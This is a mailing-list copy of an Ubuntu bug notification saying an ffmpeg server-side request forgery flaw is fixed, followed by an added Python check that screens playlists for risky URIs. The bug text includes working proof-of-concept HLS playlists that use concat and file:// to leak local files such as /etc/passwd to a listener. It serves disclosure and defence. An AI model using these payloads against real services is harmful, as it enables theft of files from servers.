group.of.nepali.translators team mailing list archive

[Bug 1533367] Re: ffmpeg allows Server-Side Request Forgery attack

 

This bug was fixed in the package ffmpeg - 7:2.8.6-1ubuntu1

---------------
ffmpeg (7:2.8.6-1ubuntu1) xenial; urgency=low

  * Merge from Debian unstable.  Remaining changes:
    - Compile with -O2 rather than -O3 on s390x, to work around
      https://bugs.launchpad.net/bugs/1526324.
  * Should fix LP: #1533367

ffmpeg (7:2.8.6-1) unstable; urgency=medium

  * Import new upstream bugfix release 2.8.6.
  * Update Standards-Version to 3.9.7.
     - Move documentation from /u/s/d/ffmpeg-doc/ to /u/s/d/ffmpeg/.
  * Use https for the Vcs-Git link.

ffmpeg (7:2.8.5-1) unstable; urgency=medium

  * Import new upstream bugfix release 2.8.5.
     - Fixes CVE-2016-1897 and CVE-2016-1898.
  * Update doc-make-apidoc-output-independent-of-SRC_PATH.patch.
  * Add patch to make out-of-tree builds bit-identical to in-tree-builds.
  * Enable the now available opencv and frei0r on mips64el.
  * Fix altivec-extra compile time optimization.
  * Update copyright year for the debian files.
  * Change priority of libavcodec*-extra* to extra.

 -- Iain Lane <iain@xxxxxxxxxxxxxxxxxxx>  Thu, 25 Feb 2016 17:48:20 +0000

** Changed in: ffmpeg (Ubuntu Xenial)
       Status: Confirmed => Fix Released

-- 
You received this bug notification because you are a member of नेपाली
भाषा समायोजकहरुको समूह, which is subscribed to Xenial.
Matching subscriptions: Ubuntu 16.04 Bugs
https://bugs.launchpad.net/bugs/1533367

Title:
  ffmpeg allows Server-Side Request Forgery attack

Status in ffmpeg package in Ubuntu:
  Fix Released
Status in ffmpeg source package in Vivid:
  Fix Released
Status in ffmpeg source package in Wily:
  Fix Released
Status in ffmpeg source package in Xenial:
  Fix Released

Bug description:
  There is a Russian blog post about SSRF and local file read with ffmpeg:
  http://habrahabr.ru/company/mailru/blog/274855/

  One of the variants:
  $ cat  /tmp/test.m3u8 
  #EXTM3U
  #EXT-X-MEDIA-SEQUENCE:0
  #EXTINF:,
  http://localhost:8080?

  (Last line - http://* without \n)

  $ cat /tmp/test.avi 
  #EXTM3U
  #EXT-X-MEDIA-SEQUENCE:0
  #EXTINF:10.0,
  concat:file:///tmp/test.m3u8|file:///tmp/test
  #EXT-X-ENDLIST

  $ cat /tmp/test
  qwerty
  123456

  Open test.avi with smplayer or even kde baloo:

  $ nc -v -l 8080
  Listening on [0.0.0.0] (family 0, port 8080)
  Connection from [127.0.0.1] port 8080 [tcp/http-alt] accepted (family 2, sport 47636)
  GET ?qwerty HTTP/1.1
  User-Agent: Lavf/56.1.0
  Accept: */*
  Range: bytes=0-
  Connection: close
  Host: localhost:8080
  Icy-MetaData: 1

  Localhost and local test.m3u8 can be changed to remote server.
  File extension does not matter.

  There is another attack with thumbnails:
  $ cat header.y4m
  YUV4MPEG2 W30 H30 F25:1 Ip A0:0 Cmono
  FRAME

  $ cat video.mp4
  #EXTM3U
  #EXT-X-MEDIA-SEQUENCE:0
  #EXTINF:10.0,
  concat:http://example.org/header.y4m|file:///etc/passwd
  #EXT-X-ENDLIST

  $ ffmpeg -i video.mp4 thumbnail.png
  $ ffmpeg -i thumbnail.png out.y4m
  $ cat out.y4m
  YUV4MPEG2 W30 H30 F25:1 Ip A0:0 Cmono
  FRAME
  # $FreeBSD: release/10.0.0/etc/master.passwd 256366 2013-10-12 06:08:18Z rpaulo $
  #
  root:*:0:0:Charlie &:/root:/usr/local/bin/zsh
  toor:*:0:0:Bourne-again Superuser:/root:

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/ffmpeg/+bug/1533367/+subscriptions
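
An added example, not part of the bug report or of ffmpeg: a pre-screening check a service could run on untrusted media before handing it to ffmpeg. It detects an HLS playlist by content (the report notes the extension does not matter) and flags URIs that use `concat:`, `file:` or point at loopback/private hosts. The allowlist, function names and sample bytes are assumptions made for this illustration.

```python
import ipaddress
import re
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"", "https"}  # assumption: relative paths and https only

def is_hls_playlist(data: bytes) -> bool:
    # Sniff content, not the name: the report notes the extension is irrelevant.
    return data.lstrip(b"\xef\xbb\xbf \t\r\n").startswith(b"#EXTM3U")

def _scheme(uri: str) -> str:
    head, sep, _ = uri.partition(":")
    return head.lower() if sep and head.isalnum() else ""

def _internal_host(uri: str) -> bool:
    # Literal check only; names resolving to internal IPs need network controls.
    try:
        host = urlsplit(uri).hostname or ""
        if host.lower() == "localhost":
            return True
        ip = ipaddress.ip_address(host)
    except ValueError:
        return False
    return ip.is_loopback or ip.is_private or ip.is_link_local

def check_uri(uri: str) -> list:
    scheme = _scheme(uri)
    if scheme == "concat":
        # concat: joins several inputs with '|'; check each nested input too.
        findings = [("concat", uri)]
        for part in uri[len("concat:"):].split("|"):
            findings += check_uri(part)
        return findings
    findings = []
    if scheme not in ALLOWED_SCHEMES:
        findings.append(("scheme:" + scheme, uri))
    if scheme in ("http", "https") and _internal_host(uri):
        findings.append(("internal-host", uri))
    return findings

def scan_playlist(data: bytes) -> list:
    if not is_hls_playlist(data):
        return []
    findings = []
    for line in data.decode("utf-8", "replace").splitlines():
        line = line.strip()
        # Segment lines are bare URIs; tags such as EXT-X-KEY carry URI="...".
        uris = re.findall(r'URI="([^"]*)"', line) if line.startswith("#") else [line]
        for uri in filter(None, uris):
            findings += check_uri(uri)
    return findings
```

A non-empty result from `scan_playlist` is a reason to reject the file before any ffmpeg-based thumbnailer or indexer opens it.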